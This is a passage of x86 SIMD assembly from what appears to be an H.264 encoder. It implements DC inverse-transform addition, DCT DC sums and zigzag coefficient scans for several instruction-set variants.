ADD_NxN_IDCT add16x16_idct_avx, add8x8_idct_avx, 128, 8, 0, 0
cextern add8x8_idct8_sse2.skip_prologue
cextern add8x8_idct8_avx.skip_prologue
ADD_NxN_IDCT add16x16_idct8_sse2, add8x8_idct8_sse2, 128, 8, 0, 0
ADD_NxN_IDCT add16x16_idct8_avx, add8x8_idct8_avx, 128, 8, 0, 0
cextern sub8x8_dct8_sse2.skip_prologue
cextern sub8x8_dct8_ssse3.skip_prologue
cextern sub8x8_dct8_avx.skip_prologue
SUB_NxN_DCT sub16x16_dct8_sse2, sub8x8_dct8_sse2, 128, 8, 0, 0, 11
SUB_NxN_DCT sub16x16_dct8_ssse3, sub8x8_dct8_ssse3, 128, 8, 0, 0, 11
SUB_NxN_DCT sub16x16_dct8_avx, sub8x8_dct8_avx, 128, 8, 0, 0, 11
INIT_YMM
ADD_NxN_IDCT add16x16_idct_avx2, add8x8_idct_avx2, 128, 8, 0, 0
%endif ; HIGH_BIT_DEPTH
%if HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void add8x8_idct_dc( pixel *p_dst, dctcoef *dct2x2 )
;-----------------------------------------------------------------------------
%macro ADD_DC 2
mova m0, [%1+FDEC_STRIDEB*0] ; 8pixels
mova m1, [%1+FDEC_STRIDEB*1]
mova m2, [%1+FDEC_STRIDEB*2]
paddsw m0, %2
paddsw m1, %2
paddsw m2, %2
paddsw %2, [%1+FDEC_STRIDEB*3]
CLIPW m0, m5, m6
CLIPW m1, m5, m6
CLIPW m2, m5, m6
CLIPW %2, m5, m6
mova [%1+FDEC_STRIDEB*0], m0
mova [%1+FDEC_STRIDEB*1], m1
mova [%1+FDEC_STRIDEB*2], m2
mova [%1+FDEC_STRIDEB*3], %2
%endmacro
%macro ADD_IDCT_DC 0
cglobal add8x8_idct_dc, 2,2,7
mova m6, [pw_pixel_max]
pxor m5, m5
mova m3, [r1]
paddd m3, [pd_32]
psrad m3, 6 ; dc0 0 dc1 0 dc2 0 dc3 0
pshuflw m4, m3, q2200 ; dc0 dc0 dc1 dc1 _ _ _ _
pshufhw m3, m3, q2200 ; _ _ _ _ dc2 dc2 dc3 dc3
pshufd m4, m4, q1100 ; dc0 dc0 dc0 dc0 dc1 dc1 dc1 dc1
pshufd m3, m3, q3322 ; dc2 dc2 dc2 dc2 dc3 dc3 dc3 dc3
ADD_DC r0+FDEC_STRIDEB*0, m4
ADD_DC r0+FDEC_STRIDEB*4, m3
RET
cglobal add16x16_idct_dc, 2,3,8
mov r2, 4
mova m6, [pw_pixel_max]
mova m7, [pd_32]
pxor m5, m5
.loop:
mova m3, [r1]
paddd m3, m7
psrad m3, 6 ; dc0 0 dc1 0 dc2 0 dc3 0
pshuflw m4, m3, q2200 ; dc0 dc0 dc1 dc1 _ _ _ _
pshufhw m3, m3, q2200 ; _ _ _ _ dc2 dc2 dc3 dc3
pshufd m4, m4, q1100 ; dc0 dc0 dc0 dc0 dc1 dc1 dc1 dc1
pshufd m3, m3, q3322 ; dc2 dc2 dc2 dc2 dc3 dc3 dc3 dc3
ADD_DC r0+FDEC_STRIDEB*0, m4
ADD_DC r0+SIZEOF_PIXEL*8, m3
add r1, 16
add r0, 4*FDEC_STRIDEB
dec r2
jg .loop
RET
%endmacro ; ADD_IDCT_DC
INIT_XMM sse2
ADD_IDCT_DC
INIT_XMM avx
ADD_IDCT_DC
%else ;!HIGH_BIT_DEPTH
%macro ADD_DC 3
mova m4, [%3+FDEC_STRIDE*0]
mova m5, [%3+FDEC_STRIDE*1]
mova m6, [%3+FDEC_STRIDE*2]
paddusb m4, %1
paddusb m5, %1
paddusb m6, %1
paddusb %1, [%3+FDEC_STRIDE*3]
psubusb m4, %2
psubusb m5, %2
psubusb m6, %2
psubusb %1, %2
mova [%3+FDEC_STRIDE*0], m4
mova [%3+FDEC_STRIDE*1], m5
mova [%3+FDEC_STRIDE*2], m6
mova [%3+FDEC_STRIDE*3], %1
%endmacro
INIT_MMX mmx2
cglobal add8x8_idct_dc, 2,2
mova m0, [r1]
pxor m1, m1
add r0, FDEC_STRIDE*4
paddw m0, [pw_32]
psraw m0, 6
psubw m1, m0
packuswb m0, m0
packuswb m1, m1
punpcklbw m0, m0
punpcklbw m1, m1
pshufw m2, m0, q3322
pshufw m3, m1, q3322
punpcklbw m0, m0
punpcklbw m1, m1
ADD_DC m0, m1, r0-FDEC_STRIDE*4
ADD_DC m2, m3, r0
RET
INIT_XMM ssse3
cglobal add8x8_idct_dc, 2,2
movh m0, [r1]
pxor m1, m1
add r0, FDEC_STRIDE*4
pmulhrsw m0, [pw_512]
psubw m1, m0
mova m5, [pb_unpackbd1]
packuswb m0, m0
packuswb m1, m1
pshufb m0, m5
pshufb m1, m5
movh m2, [r0+FDEC_STRIDE*-4]
movh m3, [r0+FDEC_STRIDE*-3]
movh m4, [r0+FDEC_STRIDE*-2]
movh m5, [r0+FDEC_STRIDE*-1]
movhps m2, [r0+FDEC_STRIDE* 0]
movhps m3, [r0+FDEC_STRIDE* 1]
movhps m4, [r0+FDEC_STRIDE* 2]
movhps m5, [r0+FDEC_STRIDE* 3]
paddusb m2, m0
paddusb m3, m0
paddusb m4, m0
paddusb m5, m0
psubusb m2, m1
psubusb m3, m1
psubusb m4, m1
psubusb m5, m1
movh [r0+FDEC_STRIDE*-4], m2
movh [r0+FDEC_STRIDE*-3], m3
movh [r0+FDEC_STRIDE*-2], m4
movh [r0+FDEC_STRIDE*-1], m5
movhps [r0+FDEC_STRIDE* 0], m2
movhps [r0+FDEC_STRIDE* 1], m3
movhps [r0+FDEC_STRIDE* 2], m4
movhps [r0+FDEC_STRIDE* 3], m5
RET
INIT_MMX mmx2
cglobal add16x16_idct_dc, 2,3
mov r2, 4
.loop:
mova m0, [r1]
pxor m1, m1
paddw m0, [pw_32]
psraw m0, 6
psubw m1, m0
packuswb m0, m0
packuswb m1, m1
punpcklbw m0, m0
punpcklbw m1, m1
pshufw m2, m0, q3322
pshufw m3, m1, q3322
punpcklbw m0, m0
punpcklbw m1, m1
ADD_DC m0, m1, r0
ADD_DC m2, m3, r0+8
add r1, 8
add r0, FDEC_STRIDE*4
dec r2
jg .loop
RET
INIT_XMM sse2
cglobal add16x16_idct_dc, 2,2,8
call .loop
add r0, FDEC_STRIDE*4
TAIL_CALL .loop, 0
.loop:
add r0, FDEC_STRIDE*4
movq m0, [r1+0]
movq m2, [r1+8]
add r1, 16
punpcklwd m0, m0
punpcklwd m2, m2
pxor m3, m3
paddw m0, [pw_32]
paddw m2, [pw_32]
psraw m0, 6
psraw m2, 6
psubw m1, m3, m0
packuswb m0, m1
psubw m3, m2
punpckhbw m1, m0, m0
packuswb m2, m3
punpckhbw m3, m2, m2
punpcklbw m0, m0
punpcklbw m2, m2
ADD_DC m0, m1, r0+FDEC_STRIDE*-4
ADD_DC m2, m3, r0
ret
%macro ADD16x16 0
cglobal add16x16_idct_dc, 2,2,8
call .loop
add r0, FDEC_STRIDE*4
TAIL_CALL .loop, 0
.loop:
add r0, FDEC_STRIDE*4
mova m0, [r1]
add r1, 16
pxor m1, m1
pmulhrsw m0, [pw_512]
psubw m1, m0
mova m5, [pb_unpackbd1]
mova m6, [pb_unpackbd2]
packuswb m0, m0
packuswb m1, m1
pshufb m2, m0, m6
pshufb m0, m5
pshufb m3, m1, m6
pshufb m1, m5
ADD_DC m0, m1, r0+FDEC_STRIDE*-4
ADD_DC m2, m3, r0
ret
%endmacro ; ADD16x16
INIT_XMM ssse3
ADD16x16
INIT_XMM avx
ADD16x16
%macro ADD_DC_AVX2 3
mova xm4, [r0+FDEC_STRIDE*0+%3]
mova xm5, [r0+FDEC_STRIDE*1+%3]
vinserti128 m4, m4, [r2+FDEC_STRIDE*0+%3], 1
vinserti128 m5, m5, [r2+FDEC_STRIDE*1+%3], 1
paddusb m4, %1
paddusb m5, %1
psubusb m4, %2
psubusb m5, %2
mova [r0+FDEC_STRIDE*0+%3], xm4
mova [r0+FDEC_STRIDE*1+%3], xm5
vextracti128 [r2+FDEC_STRIDE*0+%3], m4, 1
vextracti128 [r2+FDEC_STRIDE*1+%3], m5, 1
%endmacro
INIT_YMM avx2
cglobal add16x16_idct_dc, 2,3,6
add r0, FDEC_STRIDE*4
mova m0, [r1]
pxor m1, m1
pmulhrsw m0, [pw_512]
psubw m1, m0
mova m4, [pb_unpackbd1]
mova m5, [pb_unpackbd2]
packuswb m0, m0
packuswb m1, m1
pshufb m2, m0, m4 ; row0, row2
pshufb m3, m1, m4 ; row0, row2
pshufb m0, m5 ; row1, row3
pshufb m1, m5 ; row1, row3
lea r2, [r0+FDEC_STRIDE*8]
ADD_DC_AVX2 m2, m3, FDEC_STRIDE*-4
ADD_DC_AVX2 m2, m3, FDEC_STRIDE*-2
ADD_DC_AVX2 m0, m1, FDEC_STRIDE* 0
ADD_DC_AVX2 m0, m1, FDEC_STRIDE* 2
RET
%endif ; HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void sub8x8_dct_dc( int16_t dct[2][2], uint8_t *pix1, uint8_t *pix2 )
;-----------------------------------------------------------------------------
%macro DCTDC_2ROW_MMX 4
mova %1, [r1+FENC_STRIDE*(0+%3)]
mova m1, [r1+FENC_STRIDE*(1+%3)]
mova m2, [r2+FDEC_STRIDE*(0+%4)]
mova m3, [r2+FDEC_STRIDE*(1+%4)]
mova %2, %1
punpckldq %1, m1
punpckhdq %2, m1
mova m1, m2
punpckldq m2, m3
punpckhdq m1, m3
pxor m3, m3
psadbw %1, m3
psadbw %2, m3
psadbw m2, m3
psadbw m1, m3
psubw %1, m2
psubw %2, m1
%endmacro
%macro DCT2x2 2 ; reg s1/s0, reg s3/s2 (!=m0/m1)
PSHUFLW m1, %1, q2200 ; s1 s1 s0 s0
PSHUFLW m0, %2, q2301 ; s3 __ s2 __
paddw m1, %2 ; s1 s13 s0 s02
psubw m1, m0 ; d13 s13 d02 s02
PSHUFLW m0, m1, q1010 ; d02 s02 d02 s02
psrlq m1, 32 ; __ __ d13 s13
paddw m0, m1 ; d02 s02 d02+d13 s02+s13
psllq m1, 32 ; d13 s13
psubw m0, m1 ; d02-d13 s02-s13 d02+d13 s02+s13
%endmacro
%if HIGH_BIT_DEPTH == 0
INIT_MMX mmx2
cglobal sub8x8_dct_dc, 3,3
DCTDC_2ROW_MMX m0, m4, 0, 0
DCTDC_2ROW_MMX m5, m6, 2, 2
paddw m0, m5
paddw m4, m6
punpckldq m0, m4
add r2, FDEC_STRIDE*4
DCTDC_2ROW_MMX m7, m4, 4, 0
DCTDC_2ROW_MMX m5, m6, 6, 2
paddw m7, m5
paddw m4, m6
punpckldq m7, m4
DCT2x2 m0, m7
mova [r0], m0
ret
%macro DCTDC_2ROW_SSE2 4
movh m1, [r1+FENC_STRIDE*(0+%1)]
movh m2, [r1+FENC_STRIDE*(1+%1)]
punpckldq m1, m2
movh m2, [r2+FDEC_STRIDE*(0+%2)]
punpckldq m2, [r2+FDEC_STRIDE*(1+%2)]
psadbw m1, m0
psadbw m2, m0
ACCUM paddd, %4, 1, %3
psubd m%4, m2
%endmacro
INIT_XMM sse2
cglobal sub8x8_dct_dc, 3,3
pxor m0, m0
DCTDC_2ROW_SSE2 0, 0, 0, 3
DCTDC_2ROW_SSE2 2, 2, 1, 3
add r2, FDEC_STRIDE*4
DCTDC_2ROW_SSE2 4, 0, 0, 4
DCTDC_2ROW_SSE2 6, 2, 1, 4
packssdw m3, m3
packssdw m4, m4
DCT2x2 m3, m4
movq [r0], m0
RET
%macro SUB8x16_DCT_DC 0
cglobal sub8x16_dct_dc, 3,3
pxor m0, m0
DCTDC_2ROW_SSE2 0, 0, 0, 3
DCTDC_2ROW_SSE2 2, 2, 1, 3
add r1, FENC_STRIDE*8
add r2, FDEC_STRIDE*8
DCTDC_2ROW_SSE2 -4, -4, 0, 4
DCTDC_2ROW_SSE2 -2, -2, 1, 4
shufps m3, m4, q2020
DCTDC_2ROW_SSE2 0, 0, 0, 5
DCTDC_2ROW_SSE2 2, 2, 1, 5
add r2, FDEC_STRIDE*4
DCTDC_2ROW_SSE2 4, 0, 0, 4
DCTDC_2ROW_SSE2 6, 2, 1, 4
shufps m5, m4, q2020
%if cpuflag(ssse3)
%define %%sign psignw
%else
%define %%sign pmullw
%endif
SUMSUB_BA d, 5, 3, 0
packssdw m5, m3
pshuflw m0, m5, q2301
pshufhw m0, m0, q2301
%%sign m5, [pw_pmpmpmpm]
paddw m0, m5
pshufd m1, m0, q1320
pshufd m0, m0, q0231
%%sign m1, [pw_ppppmmmm]
paddw m0, m1
mova [r0], m0
RET
%endmacro ; SUB8x16_DCT_DC
INIT_XMM sse2
SUB8x16_DCT_DC
INIT_XMM ssse3
SUB8x16_DCT_DC
%endif ; !HIGH_BIT_DEPTH
%macro DCTDC_4ROW_SSE2 2
mova %1, [r1+FENC_STRIDEB*%2]
mova m0, [r2+FDEC_STRIDEB*%2]
%assign Y (%2+1)
%rep 3
paddw %1, [r1+FENC_STRIDEB*Y]
paddw m0, [r2+FDEC_STRIDEB*Y]
%assign Y (Y+1)
%endrep
psubw %1, m0
pshufd m0, %1, q2301
paddw %1, m0
%endmacro
%if HIGH_BIT_DEPTH
%macro SUB8x8_DCT_DC_10 0
cglobal sub8x8_dct_dc, 3,3,3
DCTDC_4ROW_SSE2 m1, 0
DCTDC_4ROW_SSE2 m2, 4
mova m0, [pw_ppmmmmpp]
pmaddwd m1, m0
pmaddwd m2, m0
pshufd m0, m1, q2200 ; -1 -1 +0 +0
pshufd m1, m1, q0033 ; +0 +0 +1 +1
paddd m1, m0
pshufd m0, m2, q1023 ; -2 +2 -3 +3
paddd m1, m2
paddd m1, m0
mova [r0], m1
RET
%endmacro
INIT_XMM sse2
SUB8x8_DCT_DC_10
%macro SUB8x16_DCT_DC_10 0
cglobal sub8x16_dct_dc, 3,3,6
DCTDC_4ROW_SSE2 m1, 0
DCTDC_4ROW_SSE2 m2, 4
DCTDC_4ROW_SSE2 m3, 8
DCTDC_4ROW_SSE2 m4, 12
mova m0, [pw_ppmmmmpp]
pmaddwd m1, m0
pmaddwd m2, m0
pshufd m5, m1, q2200 ; -1 -1 +0 +0
pshufd m1, m1, q0033 ; +0 +0 +1 +1
paddd m1, m5
pshufd m5, m2, q1023 ; -2 +2 -3 +3
paddd m1, m2
paddd m1, m5 ; a6 a2 a4 a0
pmaddwd m3, m0
pmaddwd m4, m0
pshufd m5, m3, q2200
pshufd m3, m3, q0033
paddd m3, m5
pshufd m5, m4, q1023
paddd m3, m4
paddd m3, m5 ; a7 a3 a5 a1
paddd m0, m1, m3
psubd m1, m3
pshufd m0, m0, q3120
pshufd m1, m1, q3120
punpcklqdq m2, m0, m1
punpckhqdq m1, m0
mova [r0+ 0], m2
mova [r0+16], m1
RET
%endmacro
INIT_XMM sse2
SUB8x16_DCT_DC_10
INIT_XMM avx
SUB8x16_DCT_DC_10
%endif
;-----------------------------------------------------------------------------
; void zigzag_scan_8x8_frame( int16_t level[64], int16_t dct[8][8] )
;-----------------------------------------------------------------------------
%macro SCAN_8x8 0
cglobal zigzag_scan_8x8_frame, 2,2,8
movdqa xmm0, [r1]
movdqa xmm1, [r1+16]
movdq2q mm0, xmm0
PALIGNR xmm1, xmm1, 14, xmm2
movdq2q mm1, xmm1
movdqa xmm2, [r1+32]
movdqa xmm3, [r1+48]
PALIGNR xmm2, xmm2, 12, xmm4
movdq2q mm2, xmm2
PALIGNR xmm3, xmm3, 10, xmm4
movdq2q mm3, xmm3
punpckhwd xmm0, xmm1
punpckhwd xmm2, xmm3
movq mm4, mm1
movq mm5, mm1
movq mm6, mm2
movq mm7, mm3
punpckhwd mm1, mm0
psllq mm0, 16
psrlq mm3, 16
punpckhdq mm1, mm1
punpckhdq mm2, mm0
punpcklwd mm0, mm4
punpckhwd mm4, mm3
punpcklwd mm4, mm2
punpckhdq mm0, mm2
punpcklwd mm6, mm3
punpcklwd mm5, mm7
punpcklwd mm5, mm6
movdqa xmm4, [r1+64]
movdqa xmm5, [r1+80]
movdqa xmm6, [r1+96]
movdqa xmm7, [r1+112]
movq [r0+2*00], mm0
movq [r0+2*04], mm4
movd [r0+2*08], mm1
movq [r0+2*36], mm5
movq [r0+2*46], mm6
PALIGNR xmm4, xmm4, 14, xmm3
movdq2q mm4, xmm4
PALIGNR xmm5, xmm5, 12, xmm3
movdq2q mm5, xmm5
PALIGNR xmm6, xmm6, 10, xmm3
movdq2q mm6, xmm6
%if cpuflag(ssse3)
PALIGNR xmm7, xmm7, 8, xmm3
movdq2q mm7, xmm7
%else
movhlps xmm3, xmm7
punpcklqdq xmm7, xmm7
movdq2q mm7, xmm3
%endif
punpckhwd xmm4, xmm5
punpckhwd xmm6, xmm7
movq mm0, mm4
movq mm1, mm5
movq mm3, mm7
punpcklwd mm7, mm6
psrlq mm6, 16
punpcklwd mm4, mm6
punpcklwd mm5, mm4
punpckhdq mm4, mm3
punpcklwd mm3, mm6
punpckhwd mm3, mm4
punpckhwd mm0, mm1
punpckldq mm4, mm0
punpckhdq mm0, mm6
pshufw mm4, mm4, q1230
movq [r0+2*14], mm4
movq [r0+2*25], mm0
movd [r0+2*54], mm7
movq [r0+2*56], mm5
movq [r0+2*60], mm3
punpckhdq xmm3, xmm0, xmm2
punpckldq xmm0, xmm2
punpckhdq xmm7, xmm4, xmm6
punpckldq xmm4, xmm6
pshufhw xmm0, xmm0, q0123
pshuflw xmm4, xmm4, q0123
pshufhw xmm3, xmm3, q0123
pshuflw xmm7, xmm7, q0123
movlps [r0+2*10], xmm0
movhps [r0+2*17], xmm0
movlps [r0+2*21], xmm3
movlps [r0+2*28], xmm4
movhps [r0+2*32], xmm3
movhps [r0+2*39], xmm4
movlps [r0+2*43], xmm7
movhps [r0+2*50], xmm7
RET
%endmacro
%if HIGH_BIT_DEPTH == 0
INIT_XMM sse2
SCAN_8x8
INIT_XMM ssse3
SCAN_8x8
%endif
;-----------------------------------------------------------------------------
; void zigzag_scan_8x8_frame( dctcoef level[64], dctcoef dct[8][8] )
;-----------------------------------------------------------------------------
; Output order:
; 0 8 1 2 9 16 24 17
; 10 3 4 11 18 25 32 40
; 33 26 19 12 5 6 13 20
; 27 34 41 48 56 49 42 35
; 28 21 14 7 15 22 29 36
; 43 50 57 58 51 44 37 30
; 23 31 38 45 52 59 60 53
; 46 39 47 54 61 62 55 63
%macro SCAN_8x8_FRAME 5
cglobal zigzag_scan_8x8_frame, 2,2,8
mova m0, [r1]
mova m1, [r1+ 8*SIZEOF_DCTCOEF]
movu m2, [r1+14*SIZEOF_DCTCOEF]
movu m3, [r1+21*SIZEOF_DCTCOEF]
mova m4, [r1+28*SIZEOF_DCTCOEF]
punpckl%4 m5, m0, m1
psrl%2 m0, %1
punpckh%4 m6, m1, m0
punpckl%3 m5, m0
punpckl%3 m1, m1
punpckh%4 m1, m3
mova m7, [r1+52*SIZEOF_DCTCOEF]
mova m0, [r1+60*SIZEOF_DCTCOEF]
punpckh%4 m1, m2
punpckl%4 m2, m4
punpckh%4 m4, m3
punpckl%3 m3, m3
punpckh%4 m3, m2
mova [r0], m5
mova [r0+ 4*SIZEOF_DCTCOEF], m1
mova [r0+ 8*SIZEOF_DCTCOEF], m6
punpckl%4 m6, m0
punpckl%4 m6, m7
mova m1, [r1+32*SIZEOF_DCTCOEF]
movu m5, [r1+39*SIZEOF_DCTCOEF]
movu m2, [r1+46*SIZEOF_DCTCOEF]
movu [r0+35*SIZEOF_DCTCOEF], m3
movu [r0+47*SIZEOF_DCTCOEF], m4
punpckh%4 m7, m0
psll%2 m0, %1
punpckh%3 m3, m5, m5
punpckl%4 m5, m1
punpckh%4 m1, m2
mova [r0+52*SIZEOF_DCTCOEF], m6
movu [r0+13*SIZEOF_DCTCOEF], m5
movu m4, [r1+11*SIZEOF_DCTCOEF]
movu m6, [r1+25*SIZEOF_DCTCOEF]
punpckl%4 m5, m7
punpckl%4 m1, m3
punpckh%3 m0, m7
mova m3, [r1+ 4*SIZEOF_DCTCOEF]
movu m7, [r1+18*SIZEOF_DCTCOEF]
punpckl%4 m2, m5
movu [r0+25*SIZEOF_DCTCOEF], m1
mova m1, m4
mova m5, m6
punpckl%4 m4, m3
punpckl%4 m6, m7
punpckh%4 m1, m3
punpckh%4 m5, m7
punpckh%3 m3, m6, m4
punpckh%3 m7, m5, m1
punpckl%3 m6, m4
punpckl%3 m5, m1
movu m4, [r1+35*SIZEOF_DCTCOEF]
movu m1, [r1+49*SIZEOF_DCTCOEF]
pshuf%5 m6, m6, q0123
pshuf%5 m5, m5, q0123
mova [r0+60*SIZEOF_DCTCOEF], m0
mova [r0+56*SIZEOF_DCTCOEF], m2
movu m0, [r1+42*SIZEOF_DCTCOEF]
mova m2, [r1+56*SIZEOF_DCTCOEF]
movu [r0+17*SIZEOF_DCTCOEF], m3
mova [r0+32*SIZEOF_DCTCOEF], m7
movu [r0+10*SIZEOF_DCTCOEF], m6
movu [r0+21*SIZEOF_DCTCOEF], m5
punpckh%4 m3, m0, m4
punpckh%4 m7, m2, m1
punpckl%4 m0, m4
punpckl%4 m2, m1
punpckl%3 m4, m2, m0
punpckl%3 m1, m7, m3
punpckh%3 m2, m0
punpckh%3 m7, m3
pshuf%5 m2, m2, q0123
pshuf%5 m7, m7, q0123
mova [r0+28*SIZEOF_DCTCOEF], m4
movu [r0+43*SIZEOF_DCTCOEF], m1
movu [r0+39*SIZEOF_DCTCOEF], m2
movu [r0+50*SIZEOF_DCTCOEF], m7
RET
%endmacro
%if HIGH_BIT_DEPTH
INIT_XMM sse2
SCAN_8x8_FRAME 4 , dq, qdq, dq, d
INIT_XMM avx
SCAN_8x8_FRAME 4 , dq, qdq, dq, d
%else
INIT_MMX mmx2
SCAN_8x8_FRAME 16, q , dq , wd, w
%endif
;-----------------------------------------------------------------------------
; void zigzag_scan_4x4_frame( dctcoef level[16], dctcoef dct[4][4] )
;-----------------------------------------------------------------------------
%macro SCAN_4x4 4
cglobal zigzag_scan_4x4_frame, 2,2,6
mova m0, [r1+ 0*SIZEOF_DCTCOEF]
mova m1, [r1+ 4*SIZEOF_DCTCOEF]
mova m2, [r1+ 8*SIZEOF_DCTCOEF]
mova m3, [r1+12*SIZEOF_DCTCOEF]
punpckl%4 m4, m0, m1
psrl%2 m0, %1
punpckl%3 m4, m0
mova [r0+ 0*SIZEOF_DCTCOEF], m4
punpckh%4 m0, m2
punpckh%4 m4, m2, m3
psll%2 m3, %1
punpckl%3 m2, m2
punpckl%4 m5, m1, m3
punpckh%3 m1, m1
punpckh%4 m5, m2
punpckl%4 m1, m0
punpckh%3 m3, m4
mova [r0+ 4*SIZEOF_DCTCOEF], m5
mova [r0+ 8*SIZEOF_DCTCOEF], m1
mova [r0+12*SIZEOF_DCTCOEF], m3
RET
%endmacro
%if HIGH_BIT_DEPTH
INIT_XMM sse2
SCAN_4x4 4, dq, qdq, dq
INIT_XMM avx
SCAN_4x4 4, dq, qdq, dq
%else
INIT_MMX mmx
SCAN_4x4 16, q , dq , wd
;-----------------------------------------------------------------------------
; void zigzag_scan_4x4_frame( int16_t level[16], int16_t dct[4][4] )
;-----------------------------------------------------------------------------
%macro SCAN_4x4_FRAME 0
cglobal zigzag_scan_4x4_frame, 2,2
mova m1, [r1+16]
mova m0, [r1+ 0]
pshufb m1, [pb_scan4frameb]
pshufb m0, [pb_scan4framea]
psrldq m2, m1, 6
palignr m1, m0, 6
pslldq m0, 10
palignr m2, m0, 10
mova [r0+ 0], m1
mova [r0+16], m2
RET
%endmacro
INIT_XMM ssse3
SCAN_4x4_FRAME
INIT_XMM avx
SCAN_4x4_FRAME
INIT_XMM xop
cglobal zigzag_scan_4x4_frame, 2,2
mova m0, [r1+ 0]
mova m1, [r1+16]
vpperm m2, m0, m1, [pb_scan4frame2a]
vpperm m1, m0, m1, [pb_scan4frame2b]
mova [r0+ 0], m2
mova [r0+16], m1
RET
%endif ; !HIGH_BIT_DEPTH
%if HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void zigzag_scan_4x4_field( int32_t level[16], int32_t dct[4][4] )
;-----------------------------------------------------------------------------
INIT_XMM sse2
cglobal zigzag_scan_4x4_field, 2,2
movu m0, [r1+ 8]
pshufd m0, m0, q3102
mova m1, [r1+32]
mova m2, [r1+48]
movu [r0+ 8], m0
mova [r0+32], m1
mova [r0+48], m2
movq mm0, [r1]
movq [r0], mm0
movq mm0, [r1+24]
movq [r0+24], mm0
RET
%else
;-----------------------------------------------------------------------------
; void zigzag_scan_4x4_field( int16_t level[16], int16_t dct[4][4] )
;-----------------------------------------------------------------------------
INIT_XMM sse
cglobal zigzag_scan_4x4_field, 2,2
mova m0, [r1]
mova m1, [r1+16]
pshufw mm0, [r1+4], q3102
mova [r0], m0
mova [r0+16], m1
movq [r0+4], mm0
RET
%endif ; HIGH_BIT_DEPTH
;-----------------------------------------------------------------------------
; void zigzag_scan_8x8_field( int16_t level[64], int16_t dct[8][8] )
;-----------------------------------------------------------------------------
; Output order:
; 0 1 2 8 9 3 4 10
; 16 11 5 6 7 12 17 24
; 18 13 14 15 19 25 32 26
; 20 21 22 23 27 33 40 34
; 28 29 30 31 35 41 48 42
; 36 37 38 39 43 49 50 44
; 45 46 47 51 56 57 52 53
; 54 55 58 59 60 61 62 63
%undef SCAN_8x8
%macro SCAN_8x8 5
cglobal zigzag_scan_8x8_field, 2,3,8
mova m0, [r1+ 0*SIZEOF_DCTCOEF] ; 03 02 01 00
mova m1, [r1+ 4*SIZEOF_DCTCOEF] ; 07 06 05 04
mova m2, [r1+ 8*SIZEOF_DCTCOEF] ; 11 10 09 08
pshuf%1 m3, m0, q3333 ; 03 03 03 03
movd r2d, m2 ; 09 08
pshuf%1 m2, m2, q0321 ; 08 11 10 09
punpckl%2 m3, m1 ; 05 03 04 03
pinsr%1 m0, r2d, 3 ; 08 02 01 00
punpckl%2 m4, m2, m3 ; 04 10 03 09
pshuf%1 m4, m4, q2310 ; 10 04 03 09
mova [r0+ 0*SIZEOF_DCTCOEF], m0 ; 08 02 01 00
mova [r0+ 4*SIZEOF_DCTCOEF], m4 ; 10 04 03 09
mova m3, [r1+12*SIZEOF_DCTCOEF] ; 15 14 13 12
mova m5, [r1+16*SIZEOF_DCTCOEF] ; 19 18 17 16
punpckl%3 m6, m5 ; 17 16 XX XX
psrl%4 m1, %5 ; XX 07 06 05
punpckh%2 m6, m2 ; 08 17 11 16
punpckl%3 m6, m1 ; 06 05 11 16
mova [r0+ 8*SIZEOF_DCTCOEF], m6 ; 06 05 11 16
psrl%4 m1, %5 ; XX XX 07 06
punpckl%2 m1, m5 ; 17 07 16 06
mova m0, [r1+20*SIZEOF_DCTCOEF] ; 23 22 21 20
mova m2, [r1+24*SIZEOF_DCTCOEF] ; 27 26 25 24
punpckh%3 m1, m1 ; 17 07 17 07
punpckl%2 m6, m3, m2 ; 25 13 24 12
pextr%1 r2d, m5, 2
mova [r0+24*SIZEOF_DCTCOEF], m0 ; 23 22 21 20
punpckl%2 m1, m6 ; 24 17 12 07
mova [r0+12*SIZEOF_DCTCOEF], m1
pinsr%1 m3, r2d, 0 ; 15 14 13 18
mova [r0+16*SIZEOF_DCTCOEF], m3 ; 15 14 13 18
mova m7, [r1+28*SIZEOF_DCTCOEF]
mova m0, [r1+32*SIZEOF_DCTCOEF] ; 35 34 33 32
psrl%4 m5, %5*3 ; XX XX XX 19
pshuf%1 m1, m2, q3321 ; 27 27 26 25
punpckl%2 m5, m0 ; 33 XX 32 19
psrl%4 m2, %5*3 ; XX XX XX 27
punpckl%2 m5, m1 ; 26 32 25 19
mova [r0+32*SIZEOF_DCTCOEF], m7
mova [r0+20*SIZEOF_DCTCOEF], m5 ; 26 32 25 19
mova m7, [r1+36*SIZEOF_DCTCOEF]
mova m1, [r1+40*SIZEOF_DCTCOEF] ; 43 42 41 40
pshuf%1 m3, m0, q3321 ; 35 35 34 33
punpckl%2 m2, m1 ; 41 XX 40 27
mova [r0+40*SIZEOF_DCTCOEF], m7
punpckl%2 m2, m3 ; 34 40 33 27
mova [r0+28*SIZEOF_DCTCOEF], m2
mova m7, [r1+44*SIZEOF_DCTCOEF] ; 47 46 45 44
mova m2, [r1+48*SIZEOF_DCTCOEF] ; 51 50 49 48
psrl%4 m0, %5*3 ; XX XX XX 35
punpckl%2 m0, m2 ; 49 XX 48 35
pshuf%1 m3, m1, q3321 ; 43 43 42 41
punpckl%2 m0, m3 ; 42 48 41 35
mova [r0+36*SIZEOF_DCTCOEF], m0
pextr%1 r2d, m2, 3 ; 51
psrl%4 m1, %5*3 ; XX XX XX 43
punpckl%2 m1, m7 ; 45 XX 44 43
psrl%4 m2, %5 ; XX 51 50 49
punpckl%2 m1, m2 ; 50 44 49 43
pshuf%1 m1, m1, q2310 ; 44 50 49 43
mova [r0+44*SIZEOF_DCTCOEF], m1
psrl%4 m7, %5 ; XX 47 46 45
pinsr%1 m7, r2d, 3 ; 51 47 46 45
mova [r0+48*SIZEOF_DCTCOEF], m7
mova m0, [r1+56*SIZEOF_DCTCOEF] ; 59 58 57 56
mova m1, [r1+52*SIZEOF_DCTCOEF] ; 55 54 53 52
mova m7, [r1+60*SIZEOF_DCTCOEF]
punpckl%3 m2, m0, m1 ; 53 52 57 56
punpckh%3 m1, m0 ; 59 58 55 54
mova [r0+52*SIZEOF_DCTCOEF], m2
mova [r0+56*SIZEOF_DCTCOEF], m1
mova [r0+60*SIZEOF_DCTCOEF], m7
RET
%endmacro
%if HIGH_BIT_DEPTH
INIT_XMM sse4
SCAN_8x8 d, dq, qdq, dq, 4
INIT_XMM avx
SCAN_8x8 d, dq, qdq, dq, 4
%else
INIT_MMX mmx2
SCAN_8x8 w, wd, dq , q , 16
%endif
;-----------------------------------------------------------------------------
